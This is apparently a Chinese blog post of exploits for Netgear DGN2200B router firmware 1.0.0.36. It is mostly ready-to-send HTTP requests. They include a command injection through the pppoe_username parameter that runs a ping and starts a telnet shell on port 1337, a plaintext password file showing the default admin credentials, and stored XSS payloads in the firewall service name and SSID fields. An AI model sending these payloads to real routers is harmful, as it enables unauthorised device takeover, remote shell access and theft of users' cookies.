AD

Netgear_DGN2200B多个EXP

0x01概述

       Netgear DGN2200B 1.0.0.36_7.0.36设备存在多个安全漏洞,利用这些漏洞攻击者可获取敏感信息、执行任意命令、执行HTML和脚本代码、窃取cookie等。

0x02EXP

EXP01(需要经过登录认证)

pppoe_username没有正确验证输入数据,可利用pppoe_username参数对设备注入并执行任意命令。
示例:
 POST /pppoe.cgi HTTP/1.1
 Host: 192.168.0.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.0.1/BAS_pppoe.htm
 Cookie: uid=vjkqK779eJ
 Authorization: Basic YWRtaW46cGFzc3dvcmQ=
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 593
 Connection: close
 login_type=PPPoE%28PPP+over+Ethernet%29&pppoe_username=%26%20ping%20-c%201%20192%2e168%2e0%2e2%20%26&pppoe_passwd=69cw20hb&pppoe_servicename=&pppoe_dod=1&pppoe_idletime=5&WANAssign=Dynamic&DNSAssign=0&en_nat=1&MACAssign=0&apply=%C3%9Cbernehmen&runtest=yes&wan_ipaddr=0.0.0.0&pppoe_localip=0.0.0.0&wan_dns_sel=0&wan_dns1_pri=0.0.0.0&wan_dns1_sec=...&wan_hwaddr_sel=0&wan_hwaddr_def=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr2=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr_pc=5C%3A26%3A0A%3A2B%3AF0%3A3F&wan_nat=1&opendns_parental_ctrl=0&pppoe_flet_sel=&pppoe_flet_type=&pppoe_temp=&opendns_parental_ctrl=0

主要参数为:start telnetd on port 1337:  %26%20telnetd -p 1337%20%26
等待大约30s,设备的配置保存成功,并且启动服务。

EXP02

设备存储的密码未加密,直接明文存储。
~ # cat /etc/passwd
 nobody:*:0:0:nobody:/:/bin/sh
 admin:password:0:0:admin:/:/bin/sh
 guest:guest:0:0:guest:/:/bin/sh
 ~ #

EXP03

第一处:在域名模块,userdefined参数没有严格的验证,在通过验证的情况下,可以构造JS文件,形成存储型XSS
POST /fw_serv_add.cgi HTTP/1.1
 Host: 192.168.0.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.0.1/fw_serv.cgi
 Cookie: uid=vjkqK779eJ
 Authorization: Basic xxxx=
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 114

 userdefined="><img src="0" onerror=alert(1)>&protocol=TCP&portstart=1&portend=5&apply=%C3%9Cbernehmen&which_mode=0

可以将请求更改为 HTTP GET:


第二处:SSID参数没有严格的验证。
Param: ssid
 
 POST /wlg_sec_profile_main.cgi HTTP/1.1
 Host: 192.168.0.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.0.1/WLG_wireless2_2.htm
 Cookie: uid=vjkqK779eJ
 Authorization: Basic xxxx=
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 328

 ssidSelect=1&ssid=%2522%253E%253Cscript%253Ealert%25281%2529%253&WRegion=5&w_channel=0&opmode=20n&enable_ap=1&enable_ssid_bc=1&security_type=AUTO-PSK&passphrase=friendlytrain824&Apply=%C3%9Cbernehmen&tempSetting=0&tempRegion=5&initChannel=0&h_opmode=20n&wds_enable=0&ver_type=WW&pfChanged=0&ssid_sel_submit=0&secure_sel_submit=0


评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

多种方法绕过POWERSHELL的执行策略